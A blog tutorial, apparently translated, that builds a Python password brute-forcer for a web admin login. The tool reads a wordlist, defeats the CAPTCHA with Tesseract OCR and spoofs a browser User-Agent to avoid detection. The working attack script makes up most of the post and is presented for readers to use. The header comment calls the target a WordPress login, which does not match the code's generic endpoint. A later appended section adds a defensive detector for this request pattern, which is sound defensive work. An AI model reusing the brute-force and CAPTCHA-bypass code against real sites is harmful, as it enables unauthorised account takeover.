Walks

Cybersecurity enthusiast

Python 3 Learning Series (10): Writing Your Own Intruder Tool [Part 2]

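Preface:

Following on from the previous article, this part adds a CAPTCHA-recognition step to the admin login flow.

Contents:

0x01: Processing flow

0x02: Preparation

0x03: Code implementation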


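0x01 Processing flow

[Figure: processing flow diagram (image not preserved)]

0x02 Preparation

Install the libraries needed for CAPTCHA recognition: pillow (the equivalent of PIL from Python 2.x, an image-processing library) and pytesseract (a Python library that calls Google's Tesseract OCR engine).

pip install pillow
pip install pytesseract

Finally, install Tesseract-OCR (the recognition engine); a Baidu search will find the download.

0x03 Code implementation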

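# -*- coding: utf-8 -*-
'''
Program: WordPress admin login
Function: reads a wordlist and tries each entry against the WordPress admin login; when the username is known, it can be used to brute-force the login password

Version: Python3.6
Time: 2017/11/1
Author: Walks
Blog: http://www.bywalks.com
'''
# Import requests; similar in function to urllib2 in 2.x and urllib.request in 3.x, but seemingly more powerful
import requests
# Import the libraries used for image recognition
from PIL import Image
from io import BytesIO
import pytesseract
# The urllib.request submodule has to be imported explicitly
import urllib.request

# Admin login URL
url = 'http://www.xx.cn/!logon'

# HTTP headers: add a User-Agent; some sites use the User-Agent to decide whether a request comes from a program
# and refuse it if so; adding a User-Agent gets past that kind of check
# The WordPress admin login here does not seem to need it
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
# Keep cookies across requests
s = requests.Session()
# Attach the headers
s.headers.update(headers)

# Read the text of the image CAPTCHA
def get_captcha_by_OCR(img_bytes):
    # img_bytes holds the raw bytes of the CAPTCHA image
    img = Image.open(BytesIO(img_bytes))
    # Convert the image to grayscale
    img = img.convert('L')
    img.show()
    # Recognition function: OCR the image
    captcha = pytesseract.image_to_string(img)
    img.close()
    print(captcha)
    return captcha

# Guard against errors
try:
    # Open pwd.txt
    with open('pwd.txt','r') as f:
        # Read line by line and try each entry
        for pwd in f:
            # Strip the \n from each line; viewed as bytes, every line read ends with \n
            pwd = pwd.replace('\n','')
            #print(pwd)
            response = urllib.request.urlopen('http://www.xx.cn/!code').read()

            # Build the POST data
            data = {
                    'USERNAME':'User',  # replace with your own username
                    'PASSWORD':pwd,
                    'AUTHCODE':get_captcha_by_OCR(response),
                    }
            # Attempt the login
            req = s.post(url,data = data)
            print(req.status_code)
            # Use some marker in the response to decide whether the login succeeded
            if 'SZ-09951217-Y' in req.text:
                print('OK')
                break
# On error, print the specific error
except requests.RequestException as e:
    print(e)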

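This program has one limitation: it can only handle a simple CAPTCHA-recognition flow. If you want to recognize other kinds of CAPTCHA, you can study that area yourself.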
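From the defender's side, the loop above leaves a recognisable pattern in access logs: a CAPTCHA fetch followed by a login POST, repeated at machine speed from one source, with the CAPTCHA fetched through urllib.request (default User-Agent "Python-urllib/x.y") while the POST carries the browser string set on the session. The following is an added example, not part of the original post; the log format, IP addresses, window and threshold are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

CAPTCHA_PATH, LOGIN_PATH = "/!code", "/!logon"   # placeholder paths used in the post
FIREFOX22 = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"
LINE = re.compile(r'(\S+) \[(.+?)\] "(\w+) (\S+)" (\d{3}) "(.*)"')

def sample_log():
    """Constructed log lines (hypothetical format): ip [time] "METHOD path" status "UA"."""
    t0, out = datetime(2017, 11, 1, 10, 0, 0), []
    def add(ip, sec, req, ua):
        out.append(f'{ip} [{(t0 + timedelta(seconds=sec)).isoformat()}] "{req}" 200 "{ua}"')
    for i in range(6):  # scripted client: CAPTCHA fetch, then login POST, every 2 s
        add("203.0.113.7", 2 * i, "GET /!code", "Python-urllib/3.6")
        add("203.0.113.7", 2 * i + 1, "POST /!logon", FIREFOX22)
    add("198.51.100.20", 5, "GET /!code", "Mozilla/5.0 (Windows NT 10.0) Firefox/56.0")
    add("198.51.100.20", 20, "POST /!logon", "Mozilla/5.0 (Windows NT 10.0) Firefox/56.0")
    return out

def detect(lines, window=timedelta(seconds=60), threshold=5):
    """Return {ip: details} for sources with >= threshold login POSTs inside one window."""
    posts = defaultdict(list)   # ip -> login POST timestamps
    captcha_ua = {}             # ip -> User-Agent of the most recent CAPTCHA fetch
    mismatch = set()            # ips whose CAPTCHA fetch and login POST disagree on UA
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, _status, ua = m.groups()
        if method == "GET" and path == CAPTCHA_PATH:
            captcha_ua[ip] = ua
        elif method == "POST" and path == LOGIN_PATH:
            posts[ip].append(datetime.fromisoformat(ts))
            if captcha_ua.get(ip, ua) != ua:
                mismatch.add(ip)
    alerts = {}
    for ip, times in posts.items():
        times.sort()
        start = burst = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge forward
                start += 1
            burst = max(burst, end - start + 1)
        if burst >= threshold:
            alerts[ip] = {"max_posts_in_window": burst, "ua_mismatch": ip in mismatch}
    return alerts

if __name__ == "__main__":
    print(detect(sample_log()))
```

The count is taken over all login POSTs rather than failures only, because a login form like the one in the post may answer both outcomes with the same status code.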

When reposting, please credit the source: www.bywalks.com
